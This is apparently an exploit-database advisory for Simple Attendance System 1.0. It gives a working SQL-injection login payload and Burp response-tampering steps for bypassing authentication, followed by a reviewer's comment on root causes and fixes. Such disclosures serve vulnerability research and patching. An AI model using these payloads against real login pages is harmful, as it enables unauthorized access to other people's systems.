
3 changes to exploits/shellcodes

WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass
Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
Simple Attendance System 1.0 - Authenticated bypass
# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: September 17, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
Simple Attendance System, is prone to multiple vulnerabilities.
Easy authentication bypass vulnerability on the application
allowing the attacker to login
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/attendance/login.php
Username: admin' or ''=' -- -+
Password: admin' or ''=' -- -+
----- PoC-2: Authentication Bypass -----
Steps:
1. Enter wrong crendentials http://localhost/attendance/login.php
2. Capture the request in burp and send it to repeater.
3. Forward the request.
4. In response tab, replace :
{"status":"failed","msg":"Invalid username or password."}
with
{"status":"success","msg":"Login successfully."}
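
Review bot: The "# Exploit Title" line says "Authenticated bypass" while the description and both PoC headings say "Authentication Bypass"; the title should match, since both PoCs start at the login page without a session. The description also claims "multiple vulnerabilities" without naming any: PoC 1 uses a quote-breaking payload in the login fields, which looks like SQL injection, and PoC-2 depends on the client trusting the JSON "status" value, so each root cause should be stated, along with whether PoC-2 results in a server-side session. That detail decides whether the vendor fix is parameterized queries alone or also a server-side session check on every admin page. Step 1 of PoC-2 has a typo ("crendentials").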